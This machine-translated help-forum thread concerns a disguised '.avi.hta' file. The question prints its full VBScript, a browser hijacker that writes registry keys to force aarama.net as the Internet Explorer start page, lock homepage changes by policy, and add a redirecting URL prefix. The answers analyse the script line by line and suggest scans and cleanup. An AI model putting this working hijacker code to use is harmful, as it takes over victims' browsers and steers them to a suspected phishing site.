救命...病毒?被感染了?(aarama.net)

救命...病毒?被感染了?(aarama.net)

请帮我确定一下我的计算机是否受到了威胁。

我还不确定这是什么。我仍在浏览我在“研究”期间发现的一些 JavaScript(我的级别 = 初学者)文件......

故事:

  1. Windows 7 x64 Professional、Eset Smart Security 4.2.71.2、最新 Firefox、最新 Chrome、IE 8
  2. 我在 Chrome 的默认下载文件夹中找到了一个文件adam-liseli-kizi-otele-goturup-sikiyor.avi.hta 这是一个 VB 脚本:

    Set shell = CreateObject("WScript.Shell")
    shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"
    shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
    shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 
    self.Close
    
  3. 我跟着阿拉玛网,发现有一个钓鱼网站(我认为)看起来像谷歌,并且有很多 JavaScript,我现在正试图理解它。

答案1

好吧,通过进行一些网络层面的挖掘,我可以告诉你这么多:

  1. 该域名是 20 天前注册的。
  2. 注册处在卢森堡,但电话号码在丹麦。
  3. 该网站似乎是土耳其的。
  4. 域名所有者躲在 PrivacyProtect 后面
  5. 该网站由位于旧金山的 CloudFlair 托管。

总而言之,这看起来非常非常可疑:

  1. 这是一个新域名
  2. 注册信息不对
  3. 隐藏域名注册人并不一定是坏事,但有些心怀不轨的人会这么做
  4. CloudFlare 提供免费帐户,且几乎不需要任何检查。

快速浏览一下 javascript 并在 Links 中玩弄网站,并没有发现任何太糟糕的事情,但我还没有正确分析 JS(快到午夜了)。明天早上我会深入挖掘一下。

如果您确实发现它确实是恶意软件,那么就会致电 CloudFlare 以提醒他们 - 他们可能会立即关闭该网站。

更新

aarama.net 已经转移到德国的一个托管机构,该机构因托管机器人和其他可疑网站 (your-server.de) 而臭名昭著。

答案2

我不太懂剧本,但这个剧本的意图似乎很清楚。

Set shell = CreateObject("WScript.Shell")

第一行,我不太确定。不过,谷歌搜索似乎证实了我的想法,这是剧本中相当标准的开场白。

其余行似乎正在设置各种注册表项。

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"

这为 Internet Explorer 添加了一个新的 URL 前缀。实际上,每当 IE 被告知请求以“mirc.”开头的资源并且未指定协议时,它都会插入“http://aarama.net/“在处理地址之前,地址前面会有一个空格。因此,如果您在地址栏中输入“mirc.google.com”,IE 会将其翻译为“http://aarama.net/mirc.google.com“。这可能有助于恶意网站(或下载的恶意软件)上的其他一些脚本发挥作用。

shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"  
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"

这些添加的注册表项通常用于对 Internet Explorer 实施组策略控制。您可能会发现无法再通过控制面板更改 IE 主页。

shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"  
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 

这些设置“http://aarama.net/“到您的主页 - 确保您至少访问该网站一次,并有机会成为任何可能存在的网络钓鱼诈骗或恶意代码的受害者。当然,早期的密钥将确保您不会只访问一次,因为您无法更改主页。

self.Close

再说一遍,我不太懂剧本。但我认为这一幕显然是结束的。

您可以使用这些信息来做以下事情:

1.)(太晚了) 不要去那个网站。

2.) 使用一些好的防病毒/反恶意软件程序检查您的计算机。我推荐使用 Avast! 启动时扫描、Malwarebytes 和 SpyBot Search & Destroy。如果可能,使用单独的、已知良好的一次性机器进行扫描。或者,获取一个好的 LiveCD 进行扫描。

3.) 检查注册表中是否有脚本创建的值。如果它们仍然存在,请备份注册表,然后删除创建的值或将其更改为您喜欢的设置。前三个应该被删除。最后两个,设置为您的偏好或“about:blank”。

4.) 如果您在此之后发现系统上有任何可疑活动,则是时候采取“轨道核打击”措施了。希望您有良好的备份。

答案3

这看起来确实很奇怪。我建议做几件事 - 首先是 malwarebytes - 它是一个很好的扫描器,偶尔会被恶意软件阻止 - 当它工作时很有效。除此之外,在进程管理器和 netstat 中查找奇怪的进程。

我还建议学习使用并使用 rootkit revealer(在存在 rootkit 的情况下)和 hijackthis 来确认 - 后者的日志在尝试确定是否存在入侵时非常有用,尽管它们需要一些解释。

答案4

我不是专家,但看起来它正在将该域名设为 Internet Explorer 的主页。该域名链接到 Google 网络钓鱼者。

目的是让您登录 Google 帐户,以便他们可以收集帐户信息。我还没有仔细查看过该网站,但我怀疑它还有其他用途。

无论如何,您都应该使用 Malwarebytes 进行扫描以确保无误。

相关内容